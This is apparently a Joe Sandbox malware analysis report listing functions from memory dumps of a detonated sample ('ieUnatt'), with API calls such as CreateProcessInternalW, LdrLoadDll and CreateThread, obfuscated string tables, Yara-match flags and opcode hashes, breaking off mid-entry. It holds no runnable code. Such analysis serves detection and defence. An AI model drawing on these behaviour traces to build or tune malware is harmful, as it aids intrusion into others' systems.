                                                                                  • Opcode ID: 410ff65e3a215bb2888c0610f14d63ddf3c3eecc96e8909a9ce030daff0c6245
                                                                                  • Instruction ID: 29bd35dc7c1180c99d3f4f9df181e1971afa2be95df56ca179e639c23633cd82
                                                                                  • Opcode Fuzzy Hash: 410ff65e3a215bb2888c0610f14d63ddf3c3eecc96e8909a9ce030daff0c6245
                                                                                  • Instruction Fuzzy Hash: C390023520141812F184715C450564A10058BD1315F95E115A0026654DCE15DB5977A1
                                                                                  Function 04312BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 029e56ba629c1b63cea47a0968de7c79ec572aef43e8b2126e8caeb1a01597ee
                                                                                  • Instruction ID: 9a560477ee2aa383932d0fd9af82d56c2227612710b4fae817b70d5c8c492974
                                                                                  • Opcode Fuzzy Hash: 029e56ba629c1b63cea47a0968de7c79ec572aef43e8b2126e8caeb1a01597ee
                                                                                  • Instruction Fuzzy Hash: 8D90023520545852F144715C4505A4610158BD0319F55E111A0065694D9A25DE55B661
                                                                                  Function 043135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 1a80791200d07aada2428d155c9f122b0309ab5e6b78a0b41cb415096e78dc37
                                                                                  • Instruction ID: 0ba6556e108cdd5f0d1ac85d708224aada2528d54b0bb080b8d202cce06c675e
                                                                                  • Opcode Fuzzy Hash: 1a80791200d07aada2428d155c9f122b0309ab5e6b78a0b41cb415096e78dc37
                                                                                  • Instruction Fuzzy Hash: 5A90023560551412F104715C461570620058BD0215F65E511A0425568D8B95DA5165A2
                                                                                  Function 043139B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 6a37545eadd78cad4d0e29be0f774b5778b3a57834fa8dda8f9d77c859c6c52a
                                                                                  • Instruction ID: b7342756ee3ecf30f3c4970e8e8b3b76d236b52e80c6027eab89bba375ac71fe
                                                                                  • Opcode Fuzzy Hash: 6a37545eadd78cad4d0e29be0f774b5778b3a57834fa8dda8f9d77c859c6c52a
                                                                                  • Instruction Fuzzy Hash: B790023524546112F154715C45056165005ABE0215F55E121A0815594D8955D9556221
                                                                                  Function 001C40E0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000007D0), ref: 001C41BB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID: net.dll$wininet.dll
                                                                                  • API String ID: 3472027048-1269752229
                                                                                  • Opcode ID: 3aceb126d8371d850e00c7c684b6718d06ccbeef5fc65c2721e8786892df8fd7
                                                                                  • Instruction ID: 3e90974d6b16f47b6abc021283c4ed9b6222c1697827e6646840976e88776d20
                                                                                  • Opcode Fuzzy Hash: 3aceb126d8371d850e00c7c684b6718d06ccbeef5fc65c2721e8786892df8fd7
                                                                                  • Instruction Fuzzy Hash: AA319DB0600705BBD714DFA4D885FEBBBB8FBA8710F10851DB6596B240D770AA80CBE0
                                                                                  Function 001BFB79 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeUninitialize
                                                                                  • String ID: @J7<
                                                                                  • API String ID: 3442037557-2016760708
                                                                                  • Opcode ID: de5a31385c328d8bbaf5184cb2fe0e9de137bf6faae5f28632f0df6f3a671b09
                                                                                  • Instruction ID: 6f5a132150ca543864754adcbc5b8b1e8dfbd97ad2dffd48615c5e8d48e31c60
                                                                                  • Opcode Fuzzy Hash: de5a31385c328d8bbaf5184cb2fe0e9de137bf6faae5f28632f0df6f3a671b09
                                                                                  • Instruction Fuzzy Hash: 76311275A00609AFDB00DFD8DC81DEEB7B9BF88304F108559E915E7214D775EE458BA0
                                                                                  Function 001BFB80 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeUninitialize
                                                                                  • String ID: @J7<
                                                                                  • API String ID: 3442037557-2016760708
                                                                                  • Opcode ID: 3d2868bd7d8cffc8f43c45ed604541bd459a96e091fdc21a63dcd20c9be21b48
                                                                                  • Instruction ID: 9771e849739ea15aa9e7f027d9ce5160f8fdf068d7f033600b4694e6eae96d97
                                                                                  • Opcode Fuzzy Hash: 3d2868bd7d8cffc8f43c45ed604541bd459a96e091fdc21a63dcd20c9be21b48
                                                                                  • Instruction Fuzzy Hash: 40310FB5A0060AAFDB00DFD8DC81DEEB7B9BF88304F108559E915EB214D775EE458BA0
                                                                                  Function 001B4C93 Relevance: 1.6, APIs: 1, Instructions: 90libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 001B4C42
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 053a41170c05f9030fbabc1ce501264e8b41e8ee11647377fdeb60175f8d8c96
                                                                                  • Instruction ID: 4459e64d5d37b075089c22f35c40b084b9e917ec8bfb3846d185e1fe29e44598
                                                                                  • Opcode Fuzzy Hash: 053a41170c05f9030fbabc1ce501264e8b41e8ee11647377fdeb60175f8d8c96
                                                                                  • Instruction Fuzzy Hash: 0621996654A2496BDB25CBA4CC81FEEBF64EF15328F05839DE844DF183D760D50083D1
                                                                                  Function 001B87F9 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,001B23B0,001C860F,001C5CCF,001B2380), ref: 001B87F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 5276fb4a1b239734d44764245dd22877f7e2356c71543ede17b0eb0ba95cc3d9
                                                                                  • Instruction ID: 2124314a045b1c96846d201c8d2ec0212f77575bd625e13523a45f7eeb7c361f
                                                                                  • Opcode Fuzzy Hash: 5276fb4a1b239734d44764245dd22877f7e2356c71543ede17b0eb0ba95cc3d9
                                                                                  • Instruction Fuzzy Hash: D701A7729051086AEB10BBA1EC8BFAB737C9B60714F104159F808A2141EB78EA41CBA1
                                                                                  Function 001B4BD0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 001B4C42
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 68a1343607c5a450f7786a2c1a825d0cce543795bf5a9c2a52c786633a32a0ce
                                                                                  • Instruction ID: c375ba7ccdd57b2653ef504f3849afa063888235e27b94913c2a703742b31a9b
                                                                                  • Opcode Fuzzy Hash: 68a1343607c5a450f7786a2c1a825d0cce543795bf5a9c2a52c786633a32a0ce
                                                                                  • Instruction Fuzzy Hash: AB010CB5E0020DABDB10EBA4DD42FDDB7799B64708F0081A9E90897241F731EA558B91
                                                                                  Function 001C9EE0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateProcessInternalW.KERNELBASE(?,?,B416F980,?,001B898E,00000010,?,?,?,00000044,?,00000010,001B898E,?,B416F980,?), ref: 001C9F43
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInternalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2186235152-0
                                                                                  • Opcode ID: cf02c4cc9429ea79a6d1e96201238df87769444492242351238c87c23576e22a
                                                                                  • Instruction ID: 7f0c0b54f594c63a7070a0a6bd756af256122d64ea3616071cfc2d2784e0552c
                                                                                  • Opcode Fuzzy Hash: cf02c4cc9429ea79a6d1e96201238df87769444492242351238c87c23576e22a
                                                                                  • Instruction Fuzzy Hash: E90180B6204608BBCB44DE99DC81EDB77ADEF8D754F508108BA09A3241DA30F9518BA4
                                                                                  Function 001B8A20 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 001B89FC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: cb4f00e556da49cfa7235e78ec53b1c4974b33f87a0a9f7577705fee751f48d9
                                                                                  • Instruction ID: 6f73c4cc5f606a8bae8c7702e4a113abd072dda875277fdbe1098ffea72f4a2e
                                                                                  • Opcode Fuzzy Hash: cb4f00e556da49cfa7235e78ec53b1c4974b33f87a0a9f7577705fee751f48d9
                                                                                  • Instruction Fuzzy Hash: A1F055318043140BDA30247C188A5E17B1C6B75B28F78CBA1E9148F2C6FF32DD27D291
                                                                                  Function 001A9F00 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 001A9F45
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2422867632-0
                                                                                  • Opcode ID: 1eff612db578adf7c9a658527cb72a1c0f83d5e3b372ff275e994e199846ca5b
                                                                                  • Instruction ID: 9edd628722e0f5c6b9f4b1e3b8770e89c0bfdc5abdfd4e7683365cde183d6895
                                                                                  • Opcode Fuzzy Hash: 1eff612db578adf7c9a658527cb72a1c0f83d5e3b372ff275e994e199846ca5b
                                                                                  • Instruction Fuzzy Hash: 97F0307734020437E22075E9AC02F9BA69C9B91B61F180029F60CEA1C0D991B54142E4
                                                                                  Function 001B89C9 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 001B89FC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 7d5be2cbd9e80e73f555419667aa3204c470ad418dd8067d0d4da221e1f51528
                                                                                  • Instruction ID: 589dabe5ed8c7a828d448d12055cacfaacbe965b480968c2ea67059219a88673
                                                                                  • Opcode Fuzzy Hash: 7d5be2cbd9e80e73f555419667aa3204c470ad418dd8067d0d4da221e1f51528
                                                                                  • Instruction Fuzzy Hash: 92E0D8722102046BE624A978DC82FA9334C5B8CF60F084661F818DB1C2EB74EA13D160
                                                                                  Function 001C9E00 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(001B20B9,?,001C5E8F,001B20B9,001C5CCF,001C5E8F,?,001B20B9,001C5CCF,00001000,?,?,00000000), ref: 001C9E3C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
                                                                                  • Instruction ID: 369c920568d48770b9f15d51ad2de7b793c2255adb085417cd2f27d3d15bc227
                                                                                  • Opcode Fuzzy Hash: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
                                                                                  • Instruction Fuzzy Hash: 93E06D752042047BD610EE58DC41F9B37ACDF89B10F004408F908A7242D731BA518BB5
                                                                                  Function 001C9E50 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,D08CFFD5,00000007,00000000,00000004,00000000,001B4434,000000F4), ref: 001C9E8C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3298025750-0
                                                                                  • Opcode ID: 03c4c79e38dc09a6bc7d5db5b5ebb6e976b89401a2158c2de3acff6390cbe796
                                                                                  • Instruction ID: 80f3c4f01c2a058d344cb670be03c4fd0a233eae930c5ff325f89532d9bc8602
                                                                                  • Opcode Fuzzy Hash: 03c4c79e38dc09a6bc7d5db5b5ebb6e976b89401a2158c2de3acff6390cbe796
                                                                                  • Instruction Fuzzy Hash: AEE065BA2042087FE710EF68DC41F9B37ACEFC9B10F004009FA08A7242D730B9108AB9
                                                                                  Function 001B89D0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 001B89FC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 73c06abc1a5872357217b733ae1be97597b77fa479ceb252f7eeff0ad9a7ae8c
                                                                                  • Instruction ID: 87a6d733a57040098a672bcdeb2ba0d7aa45b7404c3767144a766ba01d8c419d
                                                                                  • Opcode Fuzzy Hash: 73c06abc1a5872357217b733ae1be97597b77fa479ceb252f7eeff0ad9a7ae8c
                                                                                  • Instruction Fuzzy Hash: 1DE0867125020427FB246AB8EC46FA6335C9B8CF64F184661F91CDB2C1EB78FA12D150
                                                                                  Function 001B87C0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,001B23B0,001C860F,001C5CCF,001B2380), ref: 001B87F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 9be2c97a75a0baad5004be78a453f2c349cdf09b05c736c63d79afcd240c75b7
                                                                                  • Instruction ID: fe0355c10b7f891977713659a2ad780e263356350ea2e3383005900c92fbfd2a
                                                                                  • Opcode Fuzzy Hash: 9be2c97a75a0baad5004be78a453f2c349cdf09b05c736c63d79afcd240c75b7
                                                                                  • Instruction Fuzzy Hash: E7D05E753803043BF601A6F5DC83F5A328C5B50B94F054064F94CE72C2EE64F60041A9
                                                                                  Function 001B148B Relevance: 1.5, APIs: 1, Instructions: 20threadwindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 001B149D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID:
                                                                                  • API String ID: 1836367815-0
                                                                                  • Opcode ID: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                                  • Instruction ID: e2b26c83c3111e12e5cf48cfdf375d10cdc07337db0215546a771e36e0cffaf4
                                                                                  • Opcode Fuzzy Hash: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                                  • Instruction Fuzzy Hash: 89D0A732B4020C34EA2141905C42FFE7B6C8B51B41F004167FB04F50C1D780140506A5
                                                                                  Function 04312C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 94957a25bf822fce39eea309a7ed13c10e5dd0ecceae0ebe807eb411210e8c24
                                                                                  • Instruction ID: 3974e8f103195a83cf7f5c59ee492b08b74e59351539c7b531fda7e37b338b85
                                                                                  • Opcode Fuzzy Hash: 94957a25bf822fce39eea309a7ed13c10e5dd0ecceae0ebe807eb411210e8c24
                                                                                  • Instruction Fuzzy Hash: 6CB09B759015D5D6FB15F764470971779006BD0715F15D161D3031642E4738D1D1E175

                                                                                  Non-executed Functions

                                                                                  Function 045F04E8 Relevance: .1, Instructions: 146COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677727333.00000000045F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_45f0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d386bb627630dbe32cc7d41eefeeae4b7758c1892456d2af03914b291bdce285
                                                                                  • Instruction ID: e7bb05467dd8001ea11f58c14bcad6e30127c340ddd69b2d11fe1cb2fbe8cba9
                                                                                  • Opcode Fuzzy Hash: d386bb627630dbe32cc7d41eefeeae4b7758c1892456d2af03914b291bdce285
                                                                                  • Instruction Fuzzy Hash: 7441FA7051DB0D4FD368EF689481677B3E1FB85304F54492DDA8AC3692EB70F8468786
                                                                                  Function 045FDFCA Relevance: 57.7, Strings: 46, Instructions: 213COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677727333.00000000045F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_45f0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                  • API String ID: 0-3754132690
                                                                                  • Opcode ID: d0d2da888bc9bfe4dd4fd066b230f549b696502cb478700a218cebe9bdc33d47
                                                                                  • Instruction ID: 63b5dc0b678b4ee33f7c0677face9e90b709de15fd7fc90dfdcac85f7956156b
                                                                                  • Opcode Fuzzy Hash: d0d2da888bc9bfe4dd4fd066b230f549b696502cb478700a218cebe9bdc33d47
                                                                                  • Instruction Fuzzy Hash: 35914EF04082948AC7158F59A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89059B85
                                                                                  Function 045F3C7D Relevance: 20.1, Strings: 16, Instructions: 64COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677727333.00000000045F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_45f0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: "1*l$&lrr$',40$',40$*(&c$+1,.$,jc$//"l$c&-n$msmu$qsck$tqmq$umrx$vmsc$vpwm$vpwm
                                                                                  • API String ID: 0-3311200144
                                                                                  • Opcode ID: 0217cd2b48621ced41b2a264c866e23ac6367ed3c145a72057eedb05b82bda78
                                                                                  • Instruction ID: 499ec06678ed4515329d3de153af139eec7947e7c655fbc0de909a3022b59d32
                                                                                  • Opcode Fuzzy Hash: 0217cd2b48621ced41b2a264c866e23ac6367ed3c145a72057eedb05b82bda78
                                                                                  • Instruction Fuzzy Hash: BF3151B080474DDBCF249F84DA827DEBF71FB01354F80A248E8096B254CB768A54CB8A
                                                                                  Function 04312890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: fcef5df49392fb301ef2255593305fe5481d30946bdf8c6648413fb14a528ab0
                                                                                  • Instruction ID: 22e92337e526dded6b4cd0cc0ed9fa773ed2db3d600513fdfe346d7ef34aec0f
                                                                                  • Opcode Fuzzy Hash: fcef5df49392fb301ef2255593305fe5481d30946bdf8c6648413fb14a528ab0
                                                                                  • Instruction Fuzzy Hash: 2551D6B6B00516BFDB14DF9C899097FF7F8BF4820471092A9E4A5E7641E234FE548BA0
                                                                                  Function 04382410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
